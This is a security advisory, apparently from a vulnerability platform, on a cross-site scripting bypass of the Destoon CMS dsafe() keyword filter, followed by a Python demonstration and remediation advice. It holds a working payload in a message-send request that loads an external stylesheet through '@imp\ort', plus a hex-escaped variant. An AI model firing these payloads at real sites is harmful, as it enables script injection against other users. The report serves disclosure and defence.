### Summary: Only tested on IE6; it popped an alert box.

### Details:

The filter that the message content passes through is the project's `dsafe()` function:

```php
function dsafe($string) {
	if(is_array($string)) {
		return array_map('dsafe', $string);
	} else {
		// Strip HTML comments, CSS/JS block comments, then numeric character references
		$string = preg_replace("/\<\!\-\-([\s\S]*?)\-\-\>/", "", $string);
		$string = preg_replace("/\/\*([\s\S]*?)\*\//", "", $string);
		$string = preg_replace("/&#([a-z0-9]+)([;]*)/i", "", $string);
		// Dead check: the line above has already removed every "&#..." sequence
		if(preg_match("/&#([a-z0-9]+)([;]*)/i", $string)) return nl2br(strip_tags($string));
		// Keyword blacklist. Only 'script', 'data' and 'base' tolerate whitespace between
		// letters and only 'expression' tolerates backslashes; 'import' and the rest are
		// matched as bare literals.
		$match = array(
			"/s[\s]*c[\s]*r[\s]*i[\s]*p[\s]*t/i","/d[\s]*a[\s]*t[\s]*a/i","/b[\s]*a[\s]*s[\s]*e/i",
			"/e[\\\]*x[\\\]*p[\\\]*r[\\\]*e[\\\]*s[\\\]*s[\\\]*i[\\\]*o[\\\]*n/i",
			"/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i",
			"/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i",
			"/newline/i","/colon/i","/\\\x/i"
		);
		// Each keyword is broken up with an empty <em></em>. Note the 'confirm' entry is still
		// wrapped in regex delimiters, so 'confirm' is replaced with the literal text /con<em></em>firm/i
		$replace = array(
			"s<em></em>cript","da<em></em>ta","ba<em></em>se","ex<em></em>pression","o<em></em>n\\1\\2",
			"a<em></em>bout","f<em></em>rame","l<em></em>ink","im<em></em>port","me<em></em>ta",
			"text<em></em>area","e<em></em>val","a<em></em>lert","/con<em></em>firm/i","prom<em></em>pt",
			"coo<em></em>kie","docu<em></em>ment","new<em></em>line","co<em></em>lon","\<em></em>x"
		);
		return preg_replace($match, $replace, $string);
	}
}
```

Spelled out, the patterns it blocks are:

```
"/script/","/data/i","/base/i","/e[\]*x[\]*p[\]*r[\]*e[\]*s[\]*s[\]*i[\]*o[\]*n/i","/on([a-z]{2,})([\(|\=|\s]+)/i","/about/i","/frame/i","/link/i","/import/i","/meta/i","/textarea/i","/eval/i","/alert/i","/confirm/i","/prompt/i","/cookie/i","/document/i","/newline/i","/colon/i","/\x/i"
```

Then I noticed that `import` is not protected against `\`: unlike the `expression` entry, which allows `[\\]*` between every pair of letters, `/import/i` is a plain literal, so inserting a single backslash (`imp\ort`) defeats the match. In a `<style>` block the browser's CSS parser treats `\o` as an escaped `o`, so `@imp\ort` is parsed as `@import` and the external stylesheet is loaded:

```
action=send&typeid=-1&message%5Btouser%5D=destoon&message%5Btitle%5D=test123&message%5Bcontent%5D=<STYLE>%40imp\ort'http%3a//ha.ckers.org/xss.css'%3b</STYLE> &message%5Bcopy%5D=1&submit=+%E7%A1%AE+%E5%AE%9A+
```

### Proof of vulnerability:

![QQ截图20140627172542.png](https://images.seebug.org/upload/201406/27172540544c8b40b2d03baeb8ab8ed6c7f8013a.png)

According to the cheat sheet, this works on IE6 through IE8.
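To show concretely why the payload slips through, here is an added example (my own code, not Destoon's and not part of the original report): a Python port of two entries from the `$match`/`$replace` arrays, the backslash-tolerant `expression` rule and the bare `import` rule, next to a hardened variant that first decodes CSS backslash escapes (both the `\o` form and the hex `\6f ` form, as the browser's CSS tokenizer will) and only then applies the same blacklist. The function names and the `unescape_css` helper are this example's own; the rule strings mirror the two blacklist entries. The sample inputs are constructed from the reporter's payload.

```python
import re

# Two rules ported from the vulnerable dsafe() blacklist (this example's own port).
# 'expression' allows any number of backslashes between letters; 'import' is a bare literal.
VULN_RULES = [
    (re.compile(r"e[\\]*x[\\]*p[\\]*r[\\]*e[\\]*s[\\]*s[\\]*i[\\]*o[\\]*n", re.I),
     "ex<em></em>pression"),
    (re.compile(r"import", re.I), "im<em></em>port"),
]


def vulnerable_filter(text):
    """Apply the blacklist the way dsafe() does: break each keyword with an empty <em></em>."""
    for pattern, replacement in VULN_RULES:
        text = pattern.sub(replacement, text)
    return text


# CSS backslash escapes (CSS 2.1 section 4.1.3): '\' followed by 1..6 hex digits and an
# optional single whitespace, or '\' followed by any single non-newline character, which
# then stands for that character. This is what turns '@imp\ort' into '@import' in the browser.
CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|([^\n\r\f]))")


def unescape_css(text):
    """Decode CSS escapes so the blacklist sees the same text the CSS parser will."""
    def decode(m):
        if m.group(1) is not None:
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
        return m.group(2)
    return CSS_ESCAPE.sub(decode, text)


def hardened_filter(text):
    """Normalize escapes first, then apply the unchanged blacklist."""
    return vulnerable_filter(unescape_css(text))


def is_import_bypass(text):
    """True when the vulnerable filter leaves the input untouched while the
    escape-decoded view of it still contains @import."""
    return (vulnerable_filter(text) == text
            and re.search(r"@import", unescape_css(text), re.I) is not None)


if __name__ == "__main__":
    # Constructed samples: the reporter's payload, a hex-escaped variant, and the
    # 'expression' keyword, which the original filter does catch with a backslash.
    for sample in ["@import'http://ha.ckers.org/xss.css';",
                   "@imp\\ort'http://ha.ckers.org/xss.css';",
                   "@imp\\6f rt'http://ha.ckers.org/xss.css';",
                   "width:ex\\pression(alert(1))"]:
        print(f"{sample!r:45} bypass={is_import_bypass(sample)!s:5} "
              f"vulnerable={vulnerable_filter(sample)!r} hardened={hardened_filter(sample)!r}")
```

Running it shows `@import` being mangled, `@imp\ort` and `@imp\6f rt` passing the original rule untouched, and all three being caught once escapes are decoded first. The smallest fix in the project's own style would be to give every keyword the `[\\\s]*` treatment that `expression` already has, but any keyword blacklist over HTML and CSS stays fragile; decoding escapes before matching closes this particular hole, and not rendering user-supplied markup and style at all is what actually removes the class of bug.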